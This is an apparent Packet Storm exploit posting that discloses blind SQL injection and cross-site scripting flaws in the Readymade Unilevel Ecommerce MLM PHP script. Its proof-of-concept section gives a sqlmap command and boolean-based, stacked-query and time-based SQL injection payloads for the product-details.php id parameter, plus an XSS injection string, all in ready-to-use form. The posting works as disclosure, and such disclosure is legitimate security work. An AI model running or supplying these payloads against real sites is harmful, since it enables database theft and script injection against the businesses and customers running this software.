exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting
Posted Aug 2, 2024
Authored by OoN_Boy

Readymade Unilevel Ecommerce MLM suffers from remote blind SQL injection and cross site scripting vulnerabilities. These issues affected the version released as late as March 15, 2024.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 6516c67721502532af286b998f1bd2aa37ea2c5c4806a9a0fa77479cd3a3c623

ReadyMade Unilevel Ecommerce MLM Blind SQL Injection / Cross Site Scripting

Change Mirror Download
[x]========================================================================================================================================[x]
| Title : Readymade Unilevel Ecommerce MLM Blind SQL & XSS Vulnerabilities
| Software : Readymade Unilevel Ecommerce
| Last Update : 15/03/24 [TESTED VERSION SCRIPT]
| First Release: 16/11/21
| Vendor : http://www.i-netsolution.com/
| Date : 01 Agustus 2024
| Author : OoN_Boy
[x]========================================================================================================================================[x]
| Technology : PHP
| Database : MySQL
| Price : $500
| Description : MLM Unilevel Plan Script developed by experts and professionals. Rather than building your business from the scratch, make use of our Unilevel MLM PHP Script to launch your MLM business.
[x]========================================================================================================================================[x]

[O] Exploit

http://localhost/eommlm/product-details.php?id=11[SQL]
http://localhost/ecomlm/product-details.php?id=11[XSS]

[O] Proof of concept

sqlmap.py -u "http://localhost/eommlm/product-details.php?id=11" --invalid-string

[SQL]
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=11 AND 1189=1189

Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: id=11;SELECT SLEEP(10)#

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=11 AND (SELECT 6812 FROM (SELECT(SLEEP(10)))DddL)


[XSS]
http://localhost/ecomlm/product-details.php?id=11"><img/src/onerror=.1|alert`VrsHckGAY`+class=VrsHckGAY>

[x]========================================================================================================================================[x]

[O] Greetz

BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^

[x]========================================================================================================================================[x]
Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    0 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close